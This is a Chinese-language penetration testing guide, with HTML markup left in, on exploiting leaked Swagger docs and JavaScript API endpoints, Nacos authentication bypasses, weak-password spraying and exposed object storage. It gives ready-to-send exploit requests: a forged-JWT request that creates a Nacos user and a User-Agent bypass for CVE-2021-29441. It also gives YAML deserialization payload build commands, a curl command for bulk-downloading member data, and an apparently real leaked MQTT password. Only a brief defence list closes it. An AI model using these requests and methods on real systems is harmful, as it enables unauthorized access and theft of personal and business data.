Swagger与JS泄露渗透实战指南<\/h1>

0x01 Swagger文档泄露利用<\/h2>

发现与验证<\/h3>

目录爆破发现Swagger文档<\/strong>：通过目录扫描工具发现\/swagger\/v1\/swagger.json<\/code>或\/swagger-ui.html<\/code><\/li>

验证文档有效性<\/strong>： .json<\/code>格式可直接解析<\/li> .html<\/code>格式需查找指向的json文档路径<\/li> <\/ul> <\/li> <\/ol> 工具使用<\/h3> swagger-hack工具<\/strong>：<\/p> python swagger-hack2.0.py -u http:\/\/xxxxxx\/swagger\/v1\/swagger.json <\/span><\/span><\/code><\/pre> 生成swagger.csv文件包含所有API端点<\/li> 提取重点接口：包含list<\/code>、get<\/code>、read<\/code>等关键词的接口<\/li> <\/ul> <\/li> Burp Suite处理<\/strong>：<\/p> 将提取的接口分为GET和POST两类<\/li> GET接口直接拼接测试<\/li> POST接口携带空JSON {}<\/code>测试<\/li> <\/ul> <\/li> <\/ol> 敏感信息挖掘<\/h3> 接口爆破策略<\/strong>：<\/p> 优先测试返回数据量大的接口<\/li> 关注包含config<\/code>、driver<\/code>、user<\/code>等关键词的接口<\/li> 使用HAE插件辅助识别敏感响应<\/li> <\/ul> <\/li> 信息泄露案例<\/strong>：<\/p> { <\/span><\/span> "brokerIP"<\/span>: "xx.xxx161.59"<\/span>, <\/span><\/span> "brokerPort"<\/span>: 1883<\/span>, <\/span><\/span> "clientID"<\/span>: "iot-driver-001"<\/span>, <\/span><\/span> "userName"<\/span>: "msl_mqtt_user"<\/span>, <\/span><\/span> "password"<\/span>: "3HlcSiVhvalAq9JU"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x02 JS泄露与接口挖掘<\/h2> 前端分析<\/h3> Vue框架识别<\/strong>：<\/p> URL中包含#<\/code>符号<\/li> 查看源码中Vue相关特征<\/li> 检查异步加载的chunk文件<\/li> <\/ul> <\/li> 接口提取方法<\/strong>：<\/p> 使用Packer-Fuzz提取异步JS<\/li> 正则匹配接口模式： \/(?:http:|https:)?\\/\\/[^"']+\\/(api|admin)\\/[^"']+\/ <\/code><\/pre> <\/li> 人工全局搜索chunk<\/code>关键词<\/li> <\/ul> <\/li> <\/ol> 信息泄露利用<\/h3> 典型泄露接口<\/strong>：<\/p> 员工信息：\/admin\/tenant\/list<\/code><\/li> 会员信息：\/admin\/user-distributor\/user\/list<\/code><\/li> 订单信息：\/order\/shipments\/shipmentOrder\/export<\/code><\/li> <\/ul> <\/li> 大数据量处理<\/strong>：<\/p> 使用curl下载大容量数据： curl "https:\/\/xxxxxx\/admin\/user-distributor\/user\/list"<\/span> > xxx.txt <\/span><\/span><\/code><\/pre><\/li> 分析userid编号规律推断数据量<\/li> <\/ul> <\/li> <\/ol> 0x03 Nacos渗透实战<\/h2> 漏洞利用<\/h3> QVD-2023-6271权限绕过<\/strong>：<\/p> POST<\/span> \/nacos\/v1\/auth\/users HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> xxxxx<\/span> <\/span><\/span>Authorization:<\/span> Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>username=hellonacos&password=hellonacos <\/span><\/span><\/code><\/pre><\/li> CVE-2021-29441 UA头绕过<\/strong>：<\/p> POST<\/span> \/nacos\/v1\/auth\/users?username=hell&password=hell HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> xxxxx<\/span> <\/span><\/span>User-Agent:<\/span> Nacos-Server<\/span> <\/span><\/span><\/code><\/pre><\/li> Yaml反序列化<\/strong>：<\/p> 编译payload： javac src\/artsploit\/AwesomeScriptEngineFactory.java <\/span><\/span>jar -cvf yaml-payload.jar -C src\/ . <\/span><\/span><\/code><\/pre><\/li> 搭建恶意服务监听<\/li> <\/ul> <\/li> <\/ol> 0x04 弱口令突破技巧<\/h2> 账号规律分析<\/h3> 企业特征提取<\/strong>：<\/p> 从泄露信息中提取企业简称(如MSL)<\/li> 分析用户名模式(如工号+姓名缩写)<\/li> <\/ul> <\/li> 密码喷洒策略<\/strong>：<\/p> 固定密码+变化用户名<\/li> 常见弱密码组合： CompanyName@123 年份+企业简称手机号后6位 <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 实战案例<\/h3> 枚举检测<\/strong>：<\/p> 不同账号返回不同错误信息<\/li> 响应时间差异判断有效账号<\/li> <\/ul> <\/li> 爆破技巧<\/strong>：<\/p> 使用数值递增模式生成用户名字典<\/li> 优先测试简单密码(如123456)<\/li> <\/ul> <\/li> <\/ol> 0x05 云存储泄露利用<\/h2> 发现方法<\/h3> 接口泄露路径<\/strong>：<\/p> 检查返回数据中的存储路径<\/li> 常见模式： http:\/\/xxxxxx:9000\/file\/ http:\/\/xxxxxx:9000\/xinyihua\/ <\/code><\/pre> <\/li> <\/ul> <\/li> 目录遍历测试<\/strong>：<\/p> 逐层删除路径测试列目录<\/li> 尝试拼接\/<\/code>和..\/<\/code><\/li> <\/ul> <\/li> <\/ol> 敏感文件获取<\/h3> 合同与商业信息<\/strong>：<\/p> 搜索.doc<\/code>、.pdf<\/code>等文档<\/li> 检查文件命名规律<\/li> <\/ul> <\/li> 配置文件泄露<\/strong>：<\/p> 查找config<\/code>、setting<\/code>等关键词<\/li> 数据库连接字符串<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> Swagger文档<\/strong>：<\/p> 生产环境禁用文档<\/li> 添加认证中间件<\/li> <\/ul> <\/li> 接口安全<\/strong>：<\/p> 严格权限控制<\/li> 敏感接口添加速率限制<\/li> <\/ul> <\/li> Nacos安全<\/strong>：<\/p> 及时更新补丁<\/li> 修改默认密钥<\/li> <\/ul> <\/li> 密码策略<\/strong>：<\/p> 强制复杂度要求<\/li> 定期更换策略<\/li> <\/ul> <\/li> 云存储<\/strong>：<\/p> 设置访问权限<\/li> 禁用目录列表<\/li> <\/ul> <\/li> <\/ol> 本指南涵盖了从信息收集到权限提升的全流程技术细节，重点突出了Swagger、JS泄露和Nacos等组件的实战利用方法，以及弱口令突破的系统化思路。<\/p>